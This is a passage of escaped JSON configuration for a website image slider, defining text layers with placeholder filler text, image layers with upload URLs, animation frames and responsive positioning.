\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"9\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\"},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-538px\",\"e\":true},\"n\":{\"v\":\"127px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"85px\",\"e\":true},\"n\":{\"v\":\"555px\",\"e\":true},\"t\":{\"v\":\"465px\",\"e\":true},\"m\":{\"v\":\"465px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\"},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"10\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\"},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-536px\",\"e\":true},\"n\":{\"v\":\"129px\",\"e\":true},\"t\":{\"v\":\"249px\",\"e\":true},\"m\":{\"v\":\"249px\"}},\"y\":{\"d\":{\"v\":\"238px\",\"e\":true},\"n\":{\"v\":\"702px\",\"e\":true},\"t\":{\"v\":\"612px\",\"e\":true},\"m\":{\"v\":\"612px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\"},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-cimet-img-4-2.png\",\"imageId\":3556},\"size\":{\"width\":{\"d\":{\"v\":\"495px\",\"e\":true},\"n\":{\"v\":\"395px\",\"e\":true},\"t\":{\"v\":\"395px\"},\"m\":{\"v\":\"395px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"263px\",\"e\":true},\"t\":{\"v\":\"263px\"},\"m\":{\"v\":\"263px\",\"e\":true}},\"originalWidth\":600,\"originalHeight\":399,\"aspectRatio\":{\"d\":{\"v\":1.503759398496240518028344013146124780178070068359375},\"n\":{\"v\":1.503759398496240518028344013146124780178070068359375},\"t\":{\"v\":1.503759398496240518028344013146124780178070068359375},\"m\":{\"v\":1.503759398496240518028344013146124780178070068359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"155px\",\"e\":true},\"t\":{\"v\":\"220px\",\"e\":true},\"m\":{\"v\":\"211px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-350px\",\"e\":true},\"n\":{\"v\":\"-281px\",\"e\":true},\"t\":{\"v\":\"139px\",\"e\":true},\"m\":{\"v\":\"156px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeIn\",\"speed\":1000,\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":13,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/recept-2.png\",\"imageId\":3730},\"size\":{\"width\":{\"d\":{\"v\":\"709px\",\"e\":true},\"n\":{\"v\":\"447px\",\"e\":true},\"t\":{\"v\":\"371px\",\"e\":true},\"m\":{\"v\":\"371px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"830px\",\"e\":true},\"n\":{\"v\":\"523px\",\"e\":true},\"t\":{\"v\":\"434px\",\"e\":true},\"m\":{\"v\":\"434px\",\"e\":true}},\"originalWidth\":735,\"originalHeight\":855,\"aspectRatio\":{\"d\":{\"v\":0.859649122807017551650687892106361687183380126953125},\"n\":{\"v\":0.859649122807017551650687892106361687183380126953125},\"t\":{\"v\":0.859649122807017551650687892106361687183380126953125},\"m\":{\"v\":0.859649122807017551650687892106361687183380126953125}}},\"position\":{\"x\":{\"d\":{\"v\":\"379px\",\"e\":true},\"n\":{\"v\":\"401px\",\"e\":true},\"t\":{\"v\":\"34px\",\"e\":true},\"m\":{\"v\":\"-18px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"-17px\",\"e\":true},\"t\":{\"v\":\"316px\",\"e\":true},\"m\":{\"v\":\"227px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":16,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/home-6\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"Linear.easeNone\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"Image 14\",\"uid\":14,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-cimet-img-2.png\",\"imageId\":3565},\"size\":{\"width\":{\"d\":{\"v\":\"400px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"237px\",\"e\":true},\"m\":{\"v\":\"237px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"220px\",\"e\":true},\"t\":{\"v\":\"172px\",\"e\":true},\"m\":{\"v\":\"172px\",\"e\":true}},\"originalWidth\":400,\"originalHeight\":290,\"aspectRatio\":{\"d\":{\"v\":1.37931034482758629877707790001295506954193115234375},\"n\":{\"v\":1.37931034482758629877707790001295506954193115234375},\"t\":{\"v\":1.37931034482758629877707790001295506954193115234375},\"m\":{\"v\":1.37931034482758629877707790001295506954193115234375}}},\"position\":{\"x\":{\"d\":{\"v\":\"-190px\",\"e\":true},\"n\":{\"v\":\"-11px\",\"e\":true},\"t\":{\"v\":\"-174px\",\"e\":true},\"m\":{\"v\":\"-3px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"398px\",\"e\":true},\"n\":{\"v\":\"298px\",\"e\":true},\"t\":{\"v\":\"326px\",\"e\":true},\"m\":{\"v\":\"179px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}}